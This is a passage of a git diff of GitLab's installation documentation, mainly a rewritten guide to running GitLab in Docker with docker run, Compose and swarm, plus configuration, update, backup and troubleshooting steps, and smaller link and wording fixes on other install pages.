configuration](https://docs.gitlab.com/omnibus/settings/ssl.html) | SSL settings for Omnibus GitLab self-managed instances. | +| [GitLab.com settings](user/gitlab_com/index.md) | Settings used for GitLab.com. | + +## The entire DevOps lifecycle + +GitLab is the first single application for software development, security, +and operations that enables [Concurrent DevOps](https://about.gitlab.com/topics/concurrent-devops/). +GitLab makes the software lifecycle faster and radically improves the speed of business. + +GitLab provides solutions for [each of the stages of the DevOps lifecycle](https://about.gitlab.com/stages-devops-lifecycle/). + +## New to Git and GitLab? + +Working with new systems can be daunting. + +We have the following documentation to rapidly uplift your GitLab knowledge: + +| Topic | Description | +|:--------------------------------------------------------------------------------------------------|:------------| +| [GitLab basics guides](gitlab-basics/index.md) | Start working on the command line and with GitLab. | +| [What is GitLab Flow?](https://about.gitlab.com/topics/version-control/what-is-gitlab-flow/) | Enhance your workflow with the best of GitLab Flow. | +| [Get started with GitLab CI/CD](ci/quick_start/index.md) | Quickly implement GitLab CI/CD. | +| [Auto DevOps](topics/autodevops/index.md) | Learn more about Auto DevOps in GitLab. | +| [GitLab Markdown](user/markdown.md) | Advanced formatting system (GitLab Flavored Markdown). | + +### User account + +Learn more about GitLab account management: + +| Topic | Description | +|:-----------------------------------------------------------|:------------| +| [User account](user/profile/index.md) | Manage your account. | +| [Authentication](topics/authentication/index.md) | Account security with two-factor authentication, set up your SSH keys, and deploy keys for secure access to your projects. | +| [User settings](user/profile/index.md#access-your-user-settings) | Manage your user settings, two factor authentication, and more. | +| [User permissions](user/permissions.md) | Learn what each role in a project can do. | + +### Git and GitLab + +Learn more about using Git, and using Git with GitLab: + +| Topic | Description | +|:-----------------------------------------------------------------------------|:------------| +| [Git](topics/git/index.md) | Getting started with Git, branching strategies, Git LFS, and advanced use. | +| [Git cheat sheet](https://about.gitlab.com/images/press/git-cheat-sheet.pdf) | Download a PDF describing the most used Git operations. | +| [GitLab Flow](topics/gitlab_flow.md) | Explore the best of Git with the GitLab Flow strategy. | + +## Coming to GitLab from another platform + +If you are coming to GitLab from another platform, the following information is useful: + +| Topic | Description | +|:----------------------------------------------------|:------------| +| [Importing to GitLab](user/project/import/index.md) | Import your projects from GitHub, Bitbucket, GitLab.com, FogBugz, and SVN into GitLab. | +| [Migrating from SVN](user/project/import/svn.md) | Convert a SVN repository to Git and GitLab. | + +## Build an integration with GitLab + +There are many ways to integrate with GitLab, including: + +| Topic | Description | +|:-------------------------------------------|:------------| +| [GitLab REST API](api/README.md) | Integrate with GitLab using our REST API. | +| [GitLab GraphQL API](api/graphql/index.md) | Integrate with GitLab using our GraphQL API. | +| [Integrations](integration/index.md) | Integrations with third-party products. | + +## Contributing to GitLab + +GitLab Community Edition is [open source](https://gitlab.com/gitlab-org/gitlab-foss/) +and GitLab Enterprise Edition is [open-core](https://gitlab.com/gitlab-org/gitlab/). + +Learn how to contribute to GitLab with the following resources: + +| Topic | Description | +|:------------------------------------------------------------|:------------| +| [Development](development/index.md) | How to contribute to GitLab development. | +| [Legal](legal/index.md) | Contributor license agreements. | +| [Writing documentation](development/documentation/index.md) | How to contribute to GitLab Docs. | diff --git a/doc/install/README.md b/doc/install/README.md deleted file mode 100644 index 488d86f129d..00000000000 --- a/doc/install/README.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-05-11' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-05-11. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/install/aws/index.md b/doc/install/aws/index.md index 9444c16f7ad..5abc4bd3122 100644 --- a/doc/install/aws/index.md +++ b/doc/install/aws/index.md @@ -722,7 +722,7 @@ that you can ping and get reports. ## GitLab Runner -If you want to take advantage of [GitLab CI/CD](../../ci/README.md), you have to +If you want to take advantage of [GitLab CI/CD](../../ci/index.md), you have to set up at least one [runner](https://docs.gitlab.com/runner/). Read more on configuring an @@ -841,6 +841,6 @@ If you see this page when trying to set a password via the web interface, make s ### Some job logs are not uploaded to object storage -When the GitLab deployment is scaled up to more than one node, some job logs may not be uploaded to [object storage](../../administration/object_storage.md) properly. [Incremental logging is required](../../administration/object_storage.md#incremental-logging-is-required-for-ci-to-use-object-storage) for CI to use object storage. +When the GitLab deployment is scaled up to more than one node, some job logs may not be uploaded to [object storage](../../administration/object_storage.md) properly. [Incremental logging is required](../../administration/object_storage.md#other-alternatives-to-file-system-storage) for CI to use object storage. Enable [incremental logging](../../administration/job_logs.md#enable-or-disable-incremental-logging) if it has not already been enabled. diff --git a/doc/install/azure/index.md b/doc/install/azure/index.md index 1351489642e..9d9d06b2206 100644 --- a/doc/install/azure/index.md +++ b/doc/install/azure/index.md @@ -71,7 +71,7 @@ The first items you need to configure are the basic settings of the underlying v the user Azure uses to connect to the VM through SSH. By default, the user has root access. 1. Determine if you want to provide your own SSH key or let Azure create one for you. - Read the [SSH documentation](../../ssh/README.md) to learn more about how to set up SSH + Read the [SSH documentation](../../ssh/index.md) to learn more about how to set up SSH public keys. Review your entered settings, and then proceed to the Disks tab. @@ -226,7 +226,7 @@ The credentials are: - Username: `root` - Password: the password is automatically created, and there are [two ways to - find it](https://docs.bitnami.com/azure/faq/get-started/find-credentials). + find it](https://docs.bitnami.com/azure/faq/get-started/find-credentials/). After signing in, be sure to immediately [change the password](../../user/profile/index.md#change-your-password). diff --git a/doc/install/docker.md b/doc/install/docker.md index 064c93776a8..a6bc18bd374 100644 --- a/doc/install/docker.md +++ b/doc/install/docker.md @@ -2,17 +2,638 @@ stage: Enablement group: Distribution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -type: index --- -# Install GitLab with Docker **(FREE SELF)** +# GitLab Docker images -[Docker](https://www.docker.com) and container technology have been revolutionizing the software world for the past few years. They combine the performance and efficiency of native execution with the abstraction, security, and immutability of virtualization. +The GitLab Docker images are monolithic images of GitLab running all the +necessary services in a single container. If you instead want to install GitLab +on Kubernetes, see [GitLab Helm Charts](https://docs.gitlab.com/charts/). -GitLab provides official Docker images allowing you to easily take advantage of the benefits of containerization while operating your GitLab instance. A [complete usage guide](https://docs.gitlab.com/omnibus/docker/) for these images is available, as well as the [Dockerfile used for building the images](https://gitlab.com/gitlab-org/omnibus-gitlab/tree/master/docker). +Find the GitLab official Docker image at: -There's also a [Docker image for GitLab Runner](https://docs.gitlab.com/runner/install/docker.html). +- [GitLab Docker image in Docker Hub](https://hub.docker.com/r/gitlab/gitlab-ee/) -## Cloud native images +The Docker images don't include a mail transport agent (MTA). The recommended +solution is to add an MTA (such as Postfix or Sendmail) running in a separate +container. As another option, you can install an MTA directly in the GitLab +container, but this adds maintenance overhead as you'll likely need to reinstall +the MTA after every upgrade or restart. -GitLab is also working towards a [cloud native set of containers](https://docs.gitlab.com/charts/), with a single image for each component service. +In the following examples, if you want to use the latest RC image, use +`gitlab/gitlab-ee:rc` instead. + +WARNING: +Docker for Windows is not officially supported. There are known issues with volume +permissions, and potentially other unknown issues. If you are trying to run on Docker +for Windows, see the [getting help page](https://about.gitlab.com/get-help/) for links +to community resources (IRC, forum, etc.) to seek help from other users. + +## Prerequisites + +Docker is required. See the [official installation documentation](https://docs.docker.com/install/). + +## Set up the volumes location + +Before setting everything else, configure a new environment variable `$GITLAB_HOME` +pointing to the directory where the configuration, logs, and data files will reside. +Ensure that the directory exists and appropriate permission have been granted. + +For Linux users, set the path to `/srv/gitlab`: + +```shell +export GITLAB_HOME=/srv/gitlab +``` + +For macOS users, use the user's `$HOME/gitlab` directory: + +```shell +export GITLAB_HOME=$HOME/gitlab +``` + +The GitLab container uses host mounted volumes to store persistent data: + +| Local location | Container location | Usage | +|----------------------|--------------------|---------------------------------------------| +| `$GITLAB_HOME/data` | `/var/opt/gitlab` | For storing application data. | +| `$GITLAB_HOME/logs` | `/var/log/gitlab` | For storing logs. | +| `$GITLAB_HOME/config`| `/etc/gitlab` | For storing the GitLab configuration files. | + +## Installation + +The GitLab Docker images can be run in multiple ways: + +- [Using Docker Engine](#install-gitlab-using-docker-engine) +- [Using Docker Compose](#install-gitlab-using-docker-compose) +- [Using Docker swarm mode](#install-gitlab-using-docker-swarm-mode) + +### Install GitLab using Docker Engine + +You can fine tune these directories to meet your requirements. +Once you've set up the `GITLAB_HOME` variable, you can run the image: + +```shell +sudo docker run --detach \ + --hostname gitlab.example.com \ + --publish 443:443 --publish 80:80 --publish 22:22 \ + --name gitlab \ + --restart always \ + --volume $GITLAB_HOME/config:/etc/gitlab \ + --volume $GITLAB_HOME/logs:/var/log/gitlab \ + --volume $GITLAB_HOME/data:/var/opt/gitlab \ + gitlab/gitlab-ee:latest +``` + +This will download and start a GitLab container and publish ports needed to +access SSH, HTTP and HTTPS. All GitLab data will be stored as subdirectories of +`$GITLAB_HOME`. The container will automatically `restart` after a system reboot. + +If you are on SELinux, then run this instead: + +```shell +sudo docker run --detach \ + --hostname gitlab.example.com \ + --publish 443:443 --publish 80:80 --publish 22:22 \ + --name gitlab \ + --restart always \ + --volume $GITLAB_HOME/config:/etc/gitlab:Z \ + --volume $GITLAB_HOME/logs:/var/log/gitlab:Z \ + --volume $GITLAB_HOME/data:/var/opt/gitlab:Z \ + gitlab/gitlab-ee:latest +``` + +This will ensure that the Docker process has enough permissions to create the +config files in the mounted volumes. + +If you're using the [Kerberos integration](../integration/kerberos.md) **(PREMIUM ONLY)**, +you must also publish your Kerberos port (for example, `--publish 8443:8443`). +Failing to do so prevents Git operations with Kerberos. + +The initialization process may take a long time. You can track this +process with: + +```shell +sudo docker logs -f gitlab +``` + +After starting a container you can visit `gitlab.example.com` (or +`http://192.168.59.103` if you used boot2docker on macOS). It might take a while +before the Docker container starts to respond to queries. +The very first time you visit GitLab, you will be asked to set up the admin +password. After you change it, you can log in with username `root` and the +password you set up. + +### Install GitLab using Docker Compose + +With [Docker Compose](https://docs.docker.com/compose/) you can easily configure, +install, and upgrade your Docker-based GitLab installation: + +1. [Install Docker Compose](https://docs.docker.com/compose/install/). +1. Create a `docker-compose.yml` file (or [download an example](https://gitlab.com/gitlab-org/omnibus-gitlab/raw/master/docker/docker-compose.yml)): + + ```yaml + web: + image: 'gitlab/gitlab-ee:latest' + restart: always + hostname: 'gitlab.example.com' + environment: + GITLAB_OMNIBUS_CONFIG: | + external_url 'https://gitlab.example.com' + # Add any other gitlab.rb configuration here, each on its own line + ports: + - '80:80' + - '443:443' + - '22:22' + volumes: + - '$GITLAB_HOME/config:/etc/gitlab' + - '$GITLAB_HOME/logs:/var/log/gitlab' + - '$GITLAB_HOME/data:/var/opt/gitlab' + ``` + +1. Make sure you are in the same directory as `docker-compose.yml` and start + GitLab: + + ```shell + docker-compose up -d + ``` + +NOTE: +Read the ["Pre-configure Docker container"](#pre-configure-docker-container) section +to see how the `GITLAB_OMNIBUS_CONFIG` variable works. + +Below is another `docker-compose.yml` example with GitLab running on a custom +HTTP and SSH port. Notice how the `GITLAB_OMNIBUS_CONFIG` variables match the +`ports` section: + +```yaml +web: + image: 'gitlab/gitlab-ee:latest' + restart: always + hostname: 'gitlab.example.com' + environment: + GITLAB_OMNIBUS_CONFIG: | + external_url 'http://gitlab.example.com:8929' + gitlab_rails['gitlab_shell_ssh_port'] = 2224 + ports: + - '8929:8929' + - '2224:22' + volumes: + - '$GITLAB_HOME/config:/etc/gitlab' + - '$GITLAB_HOME/logs:/var/log/gitlab' + - '$GITLAB_HOME/data:/var/opt/gitlab' +``` + +This is the same as using `--publish 8929:8929 --publish 2224:22`. + +### Install GitLab using Docker swarm mode + +With [Docker swarm mode](https://docs.docker.com/engine/swarm/), you can easily +configure and deploy your +Docker-based GitLab installation in a swarm cluster. + +In swarm mode you can leverage [Docker secrets](https://docs.docker.com/engine/swarm/secrets/) +and [Docker configs](https://docs.docker.com/engine/swarm/configs/) to efficiently and securely deploy your GitLab instance. +Secrets can be used to securely pass your initial root password without exposing it as an environment variable. +Configs can help you to keep your GitLab image as generic as possible. + +Here's an example that deploys GitLab with four runners as a [stack](https://docs.docker.com/get-started/part5/), using secrets and configs: + +1. [Set up a Docker swarm](https://docs.docker.com/engine/swarm/swarm-tutorial/). +1. Create a `docker-compose.yml` file: + + ```yaml + version: "3.6" + services: + gitlab: + image: gitlab/gitlab-ee:latest + ports: + - "22:22" + - "80:80" + - "443:443" + volumes: + - $GITLAB_HOME/data:/var/opt/gitlab + - $GITLAB_HOME/logs:/var/log/gitlab + - $GITLAB_HOME/config:/etc/gitlab + environment: + GITLAB_OMNIBUS_CONFIG: "from_file('/omnibus_config.rb')" + configs: + - source: gitlab + target: /omnibus_config.rb + secrets: + - gitlab_root_password + gitlab-runner: + image: gitlab/gitlab-runner:alpine + deploy: + mode: replicated + replicas: 4 + configs: + gitlab: + file: ./gitlab.rb + secrets: + gitlab_root_password: + file: ./root_password.txt + ``` + + For simplicity reasons, the `network` configuration was omitted. + More information can be found in the official [Compose file reference](https://docs.docker.com/compose/compose-file/). + +1. Create a `gitlab.rb` file: + + ```ruby + external_url 'https://my.domain.com/' + gitlab_rails['initial_root_password'] = File.read('/run/secrets/gitlab_root_password') + ``` + +1. Create a `root_password.txt` file: + + ```plaintext + MySuperSecretAndSecurePass0rd! + ``` + +1. Make sure you are in the same directory as `docker-compose.yml` and run: + + ```shell + docker stack deploy --compose-file docker-compose.yml mystack + ``` + +## Configuration + +This container uses the official Omnibus GitLab package, so all configuration +is done in the unique configuration file `/etc/gitlab/gitlab.rb`. + +To access the GitLab configuration file, you can start a shell session in the +context of a running container. This will allow you to browse all directories +and use your favorite text editor: + +```shell +sudo docker exec -it gitlab /bin/bash +``` + +You can also just edit `/etc/gitlab/gitlab.rb`: + +```shell +sudo docker exec -it gitlab editor /etc/gitlab/gitlab.rb +``` + +Once you open `/etc/gitlab/gitlab.rb` make sure to set the `external_url` to +point to a valid URL. + +To receive e-mails from GitLab you have to configure the +[SMTP settings](https://docs.gitlab.com/omnibus/settings/smtp.html) because the GitLab Docker image doesn't +have an SMTP server installed. You may also be interested in +[enabling HTTPS](https://docs.gitlab.com/omnibus/settings/nginx.html#enable-https). + +After you make all the changes you want, you will need to restart the container +in order to reconfigure GitLab: + +```shell +sudo docker restart gitlab +``` + +GitLab will reconfigure itself whenever the container starts. +For more options about configuring GitLab, check the +[configuration documentation](https://docs.gitlab.com/omnibus/settings/configuration.html). + +### Pre-configure Docker container + +You can pre-configure the GitLab Docker image by adding the environment variable +`GITLAB_OMNIBUS_CONFIG` to Docker run command. This variable can contain any +`gitlab.rb` setting and is evaluated before the loading of the container's +`gitlab.rb` file. This behavior allows you to configure the external GitLab URL, +and make database configuration or any other option from the +[Omnibus GitLab template](https://gitlab.com/gitlab-org/omnibus-gitlab/blob/master/files/gitlab-config-template/gitlab.rb.template). +The settings contained in `GITLAB_OMNIBUS_CONFIG` aren't written to the +`gitlab.rb` configuration file, and are evaluated on load. + +Here's an example that sets the external URL and enables LFS while starting +the container: + +```shell +sudo docker run --detach \ + --hostname gitlab.example.com \ + --env GITLAB_OMNIBUS_CONFIG="external_url 'http://my.domain.com/'; gitlab_rails['lfs_enabled'] = true;" \ + --publish 443:443 --publish 80:80 --publish 22:22 \ + --name gitlab \ + --restart always \ + --volume $GITLAB_HOME/config:/etc/gitlab \ + --volume $GITLAB_HOME/logs:/var/log/gitlab \ + --volume $GITLAB_HOME/data:/var/opt/gitlab \ + gitlab/gitlab-ee:latest +``` + +Note that every time you execute a `docker run` command, you need to provide +the `GITLAB_OMNIBUS_CONFIG` option. The content of `GITLAB_OMNIBUS_CONFIG` is +_not_ preserved between subsequent runs. + +### Use tagged versions of GitLab + +Tagged versions of the GitLab Docker images are also provided. +To see all available tags see: + +- [GitLab CE tags](https://hub.docker.com/r/gitlab/gitlab-ce/tags/) +- [GitLab EE tags](https://hub.docker.com/r/gitlab/gitlab-ee/tags/) + +To use a specific tagged version, replace `gitlab/gitlab-ee:latest` with +the GitLab version you want to run, for example `gitlab/gitlab-ee:12.1.3-ce.0`. + +### Run GitLab on a public IP address + +You can make Docker to use your IP address and forward all traffic to the +GitLab container by modifying the `--publish` flag. + +To expose GitLab on IP `198.51.100.1`: + +```shell +sudo docker run --detach \ + --hostname gitlab.example.com \ + --publish 198.51.100.1:443:443 \ + --publish 198.51.100.1:80:80 \ + --publish 198.51.100.1:22:22 \ + --name gitlab \ + --restart always \ + --volume $GITLAB_HOME/config:/etc/gitlab \ + --volume $GITLAB_HOME/logs:/var/log/gitlab \ + --volume $GITLAB_HOME/data:/var/opt/gitlab \ + gitlab/gitlab-ee:latest +``` + +You can then access your GitLab instance at `http://198.51.100.1/` and `https://198.51.100.1/`. + +### Expose GitLab on different ports + +GitLab will occupy [some ports](https://docs.gitlab.com/omnibus/package-information/defaults.html) +inside the container. + +If you want to use a different host port than `80` (HTTP) or `443` (HTTPS), +you need to add a separate `--publish` directive to the `docker run` command. + +For example, to expose the web interface on the host's port `8929`, and the SSH service on +port `2289`: + +1. Use the following `docker run` command: + + ```shell + sudo docker run --detach \ + --hostname gitlab.example.com \ + --publish 8929:8929 --publish 2289:22 \ + --name gitlab \ + --restart always \ + --volume $GITLAB_HOME/config:/etc/gitlab \ + --volume $GITLAB_HOME/logs:/var/log/gitlab \ + --volume $GITLAB_HOME/data:/var/opt/gitlab \ + gitlab/gitlab-ee:latest + ``` + + NOTE: + The format for publishing ports is `hostPort:containerPort`. Read more in + Docker's documentation about + [exposing incoming ports](https://docs.docker.com/engine/reference/run/#/expose-incoming-ports). + +1. Enter the running container: + + ```shell + sudo docker exec -it gitlab /bin/bash + ``` + +1. Open `/etc/gitlab/gitlab.rb` with your editor and set `external_url`: + + ```ruby + # For HTTP + external_url "http://gitlab.example.com:8929" + + or + + # For HTTPS (notice the https) + external_url "https://gitlab.example.com:8929" + ``` + + The port specified in this URL must match the port published to the host by Docker. + Additionally, if the NGINX listen port is not explicitly set in + `nginx['listen_port']`, it will be pulled from the `external_url`. + For more information see the [NGINX documentation](https://docs.gitlab.com/omnibus/settings/nginx.html). + +1. Set `gitlab_shell_ssh_port`: + + ```ruby + gitlab_rails['gitlab_shell_ssh_port'] = 2289 + ``` + +1. Finally, reconfigure GitLab: + + ```shell + gitlab-ctl reconfigure + ``` + +Following the above example, you will be able to reach GitLab from your +web browser under `<hostIP>:8929` and push using SSH under the port `2289`. + +A `docker-compose.yml` example that uses different ports can be found in the +[Docker compose](#install-gitlab-using-docker-compose) section. + +## Update + +In most cases, updating GitLab is as easy as downloading the newest Docker +[image tag](#use-tagged-versions-of-gitlab). + +### Update GitLab using Docker Engine + +To update GitLab that was [installed using Docker Engine](#install-gitlab-using-docker-engine): + +1. Take a [backup](#back-up-gitlab). +1. Stop the running container: + + ```shell + sudo docker stop gitlab + ``` + +1. Remove the existing container: + + ```shell + sudo docker rm gitlab + ``` + +1. Pull the new image. For example, the latest GitLab image: + + ```shell + sudo docker pull gitlab/gitlab-ee:latest + ``` + +1. Create the container once again with the +[previously specified](#install-gitlab-using-docker-engine) options: + + ```shell + sudo docker run --detach \ + --hostname gitlab.example.com \ + --publish 443:443 --publish 80:80 --publish 22:22 \ + --name gitlab \ + --restart always \ + --volume $GITLAB_HOME/config:/etc/gitlab \ + --volume $GITLAB_HOME/logs:/var/log/gitlab \ + --volume $GITLAB_HOME/data:/var/opt/gitlab \ + gitlab/gitlab-ee:latest + ``` + +On the first run, GitLab will reconfigure and update itself. + +Refer to the GitLab [Update recommendations](../policy/maintenance.md#upgrade-recommendations) +when upgrading between major versions. + +### Update GitLab using Docker compose + +To update GitLab that was [installed using Docker Compose](#install-gitlab-using-docker-compose): + +1. Take a [backup](#back-up-gitlab). +1. Download the newest release and update your GitLab instance: + + ```shell + docker-compose pull + docker-compose up -d + ``` + + If you have used [tags](#use-tagged-versions-of-gitlab) instead, you'll need + to first edit `docker-compose.yml`. + +## Back up GitLab + +You can create a GitLab backup with: + +```shell +docker exec -t <container name> gitlab-backup create +``` + +Read more on how to [back up and restore GitLab](../raketasks/backup_restore.md). + +NOTE: +If configuration is provided entirely via the `GITLAB_OMNIBUS_CONFIG` environment variable +(per the ["Pre-configure Docker Container"](#pre-configure-docker-container) steps), +meaning no configuration is set directly in the `gitlab.rb` file, then there is no need +to back up the `gitlab.rb` file. + +## Installing GitLab Community Edition + +[GitLab CE Docker image](https://hub.docker.com/r/gitlab/gitlab-ce/) + +To install the Community Edition, replace `ee` with `ce` in the commands on this +page. + +## Troubleshooting + +The following information will help if you encounter problems using Omnibus GitLab and Docker. + +### Diagnose potential problems + +Read container logs: + +```shell +sudo docker logs gitlab +``` + +Enter running container: + +```shell +sudo docker exec -it gitlab /bin/bash +``` + +From within the container you can administer the GitLab container as you would +normally administer an +[Omnibus installation](https://gitlab.com/gitlab-org/omnibus-gitlab/blob/master/README.md) + +### 500 Internal Error + +When updating the Docker image you may encounter an issue where all paths +display a `500` page. If this occurs, restart the container to try to rectify the +issue: + +```shell +sudo docker restart gitlab +``` + +### Permission problems + +When updating from older GitLab Docker images you might encounter permission +problems. This happens when users in previous images were not +preserved correctly. There's script that fixes permissions for all files. + +To fix your container, execute `update-permissions` and restart the +container afterwards: + +```shell +sudo docker exec gitlab update-permissions +sudo docker restart gitlab +``` + +### Windows/Mac: `Error executing action run on resource ruby_block[directory resource: /data/GitLab]` + +This error occurs when using Docker Toolbox with VirtualBox on Windows or Mac, +and making use of Docker volumes. The `/c/Users` volume is mounted as a +VirtualBox Shared Folder, and does not support the all POSIX filesystem features. +The directory ownership and permissions cannot be changed without remounting, and +GitLab fails. + +Our recommendation is to switch to using the native Docker install for your +platform, instead of using Docker Toolbox. + +If you cannot use the native Docker install (Windows 10 Home Edition, or Windows 7/8), +then an alternative solution is to setup NFS mounts instead of VirtualBox shares for +Docker Toolbox's boot2docker. + +### Linux ACL issues + +If you are using file ACLs on the Docker host, the `docker` group requires full access to the volumes in order for GitLab to work: + +```shell +getfacl $GITLAB_HOME + +# file: $GITLAB_HOME +# owner: XXXX +# group: XXXX +user::rwx +group::rwx +group:docker:rwx +mask::rwx +default:user::rwx +default:group::rwx +default:group:docker:rwx +default:mask::rwx +default:other::r-x +``` + +If these are not correct, set them with: + +```shell +sudo setfacl -mR default:group:docker:rwx $GITLAB_HOME +``` + +The default group is `docker`. If you changed the group, be sure to update your +commands. + +### /dev/shm mount not having enough space in Docker container + +GitLab comes with a Prometheus metrics endpoint at `/-/metrics` to expose a +variety of statistics on the health and performance of GitLab. The files +required for this gets written to a temporary file system (like `/run` or +`/dev/shm`). + +By default, Docker allocates 64Mb to the shared memory directory (mounted at +`/dev/shm`). This is insufficient to hold all the Prometheus metrics related +files generated, and will generate error logs like the following: + +```plaintext +writing value to /dev/shm/gitlab/sidekiq/gauge_all_sidekiq_0-1.db failed with unmapped file +writing value to /dev/shm/gitlab/sidekiq/gauge_all_sidekiq_0-1.db failed with unmapped file +writing value to /dev/shm/gitlab/sidekiq/gauge_all_sidekiq_0-1.db failed with unmapped file +writing value to /dev/shm/gitlab/sidekiq/histogram_sidekiq_0-0.db failed with unmapped file +writing value to /dev/shm/gitlab/sidekiq/histogram_sidekiq_0-0.db failed with unmapped file +writing value to /dev/shm/gitlab/sidekiq/histogram_sidekiq_0-0.db failed with unmapped file +writing value to /dev/shm/gitlab/sidekiq/histogram_sidekiq_0-0.db failed with unmapped file +``` + +Other than disabling the Prometheus Metrics from the Admin page, the recommended +solution to fix this problem is to increase the size of shm to at least 256Mb. +If using `docker run`, this can be done by passing the flag `--shm-size 256m`. +If using a `docker-compose.yml` file, the `shm_size` key can be used for this +purpose. + +### Docker containers exhausts space due to the `json-file` + +Docker's [default logging driver is `json-file`](https://docs.docker.com/config/containers/logging/configure/#configure-the-default-logging-driver), which performs no log rotation by default. As a result of this lack of rotation, log files stored by the `json-file` driver can consume a significant amount of disk space for containers that generate a lot of output. This can lead to disk space exhaustion. To address this, use [journald](https://docs.docker.com/config/containers/logging/journald/) as the logging driver when available, or [another supported driver](https://docs.docker.com/config/containers/logging/configure/#supported-logging-drivers) with native rotation support. diff --git a/doc/install/google_cloud_platform/index.md b/doc/install/google_cloud_platform/index.md index 958f3e18c62..bda98ead1f5 100644 --- a/doc/install/google_cloud_platform/index.md +++ b/doc/install/google_cloud_platform/index.md @@ -12,7 +12,7 @@ This guide will help you install GitLab on a [Google Cloud Platform (GCP)](https NOTE: Google provides a whitepaper for [deploying production-ready GitLab on -Google Kubernetes Engine](https://cloud.google.com/solutions/deploying-production-ready-gitlab-on-gke), +Google Kubernetes Engine](https://cloud.google.com/architecture/deploying-production-ready-gitlab-on-gke), including all steps and external resource configuration. These are an alternative to using a GCP VM, and use the [Cloud native GitLab Helm chart](https://docs.gitlab.com/charts/). diff --git a/doc/install/index.md b/doc/install/index.md index 8e34ac24b71..df2f230fd27 100644 --- a/doc/install/index.md +++ b/doc/install/index.md @@ -31,7 +31,7 @@ install GitLab: | [Helm charts](https://docs.gitlab.com/charts/) | The cloud native Helm chart for installing GitLab and all of its components on Kubernetes. | When installing GitLab on Kubernetes, there are some trade-offs that you need to be aware of: <br/>- Administration and troubleshooting requires Kubernetes knowledge.<br/>- It can be more expensive for smaller installations. The default installation requires more resources than a single node Linux package deployment, as most services are deployed in a redundant fashion.<br/>- There are some feature [limitations to be aware of](https://docs.gitlab.com/charts/#limitations).<br/><br/> Use this method if your infrastructure is built on Kubernetes and you're familiar with how it works. The methods for management, observability, and some concepts are different than traditional deployments. | | [Docker](https://docs.gitlab.com/omnibus/docker/) | The GitLab packages, Dockerized. | Use this method if you're familiar with Docker. | | [Source](installation.md) | Install GitLab and all of its components from scratch. | Use this method if none of the previous methods are available for your platform. Useful for unsupported systems like \*BSD.| -| [GitLab Environment Toolkit (GET)](https://gitlab.com/gitlab-org/quality/gitlab-environment-toolkit#documentation) | The GitLab Environment toolkit provides a set of automation tools to deploy a [reference architecture](../administration/reference_architectures/index.md) on most major cloud providers. | Since GET is in beta and not yet recommended for production use, use this method if you want to test deploying GitLab in scalable environment. | +| [GitLab Environment Toolkit (GET)](https://gitlab.com/gitlab-org/quality/gitlab-environment-toolkit#documentation) | The GitLab Environment toolkit provides a set of automation tools to deploy a [reference architecture](../administration/reference_architectures/index.md) on most major cloud providers. | Customers are very welcome to trial and evaluate GET today, however be aware of [key limitations](https://gitlab.com/gitlab-org/quality/gitlab-environment-toolkit#missing-features-to-be-aware-of) of the current iteration. For production environments further manual setup will be required based on your specific requirements. | ## Install GitLab on cloud providers diff --git a/doc/install/installation.md b/doc/install/installation.md index 572c6de18d0..9db8631a6a5 100644 --- a/doc/install/installation.md +++ b/doc/install/installation.md @@ -1004,6 +1004,17 @@ Using Sidekiq directly is still supported until 14.0. So if you're experiencing 1. Restart GitLab. 1. [Create an issue](https://gitlab.com/gitlab-org/gitlab/-/issues/-/new) describing the problem. +### Prometheus server setup + +You can configure the Prometheus server in `config/gitlab.yml`: + +```yaml +# example +prometheus: + enabled: true + server_address: '10.1.2.3:9090' +``` + ## Troubleshooting ### "You appear to have cloned an empty repository." diff --git a/doc/install/next_steps.md b/doc/install/next_steps.md index 4e4f1f01a08..f271caef493 100644 --- a/doc/install/next_steps.md +++ b/doc/install/next_steps.md @@ -26,7 +26,7 @@ installation. ## Security -- [Secure GitLab](../security/README.md#securing-your-gitlab-installation): +- [Secure GitLab](../security/index.md#securing-your-gitlab-installation): Recommended practices to secure your GitLab instance. - Sign up for the GitLab [Security Newsletter](https://about.gitlab.com/company/preference-center/) to get notified for security updates upon release. diff --git a/doc/install/openshift_and_gitlab/index.md b/doc/install/openshift_and_gitlab/index.md index 31c3ca60b84..b13293eccfc 100644 --- a/doc/install/openshift_and_gitlab/index.md +++ b/doc/install/openshift_and_gitlab/index.md @@ -23,8 +23,6 @@ In this tutorial, we will see how to deploy GitLab in OpenShift using the GitLab official Docker image while getting familiar with the web interface and CLI tools that help us achieve our goal. -For a video demonstration on installing GitLab on OpenShift, check the article [In 13 minutes from Kubernetes to a complete application development tool](https://about.gitlab.com/blog/2016/11/14/idea-to-production/). - ## Prerequisites WARNING: diff --git a/doc/install/postgresql_extensions.md b/doc/install/postgresql_extensions.md index 80bbb0671b9..99c85f4f808 100644 --- a/doc/install/postgresql_extensions.md +++ b/doc/install/postgresql_extensions.md @@ -9,7 +9,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w This guide documents how to manage PostgreSQL extensions for installations with an external PostgreSQL database. -The following extensions must be loaded into the GitLab database: +You must load the following extensions into the main GitLab database (defaults to `gitlabhq_production`): | Extension | Minimum GitLab version | |--------------|------------------------| @@ -17,6 +17,13 @@ The following extensions must be loaded into the GitLab database: | `btree_gist` | 13.1 | | `plpgsql` | 11.7 | +If you are using [GitLab Geo](https://about.gitlab.com/solutions/geo/), you must load the following +extensions into all secondary tracking databases (defaults to `gitlabhq_geo_production`): + +| Extension | Minimum GitLab version | +|--------------|------------------------| +| `plpgsql` | 9.0 | + In order to install extensions, PostgreSQL requires the user to have superuser privileges. Typically, the GitLab database user is not a superuser. Therefore, regular database migrations cannot be used in installing extensions and instead, extensions have to be installed manually diff --git a/doc/install/requirements.md b/doc/install/requirements.md index 3a8b7bf1004..71d00e3f688 100644 --- a/doc/install/requirements.md +++ b/doc/install/requirements.md @@ -70,6 +70,9 @@ NOTE: Since file system performance may affect the overall performance of GitLab, [we don't recommend using cloud-based file systems for storage](../administration/nfs.md#avoid-using-cloud-based-file-systems). +NOTE: +[NFS for Git repository storage is deprecated](https://about.gitlab.com/releases/2021/06/22/gitlab-14-0-released/#nfs-for-git-repository-storage-deprecated). See our official [Statement of Support](https://about.gitlab.com/support/statement-of-support.html#gitaly-and-nfs) for further information. + ### CPU CPU requirements are dependent on the number of users and expected workload. Your exact needs may be more, depending on 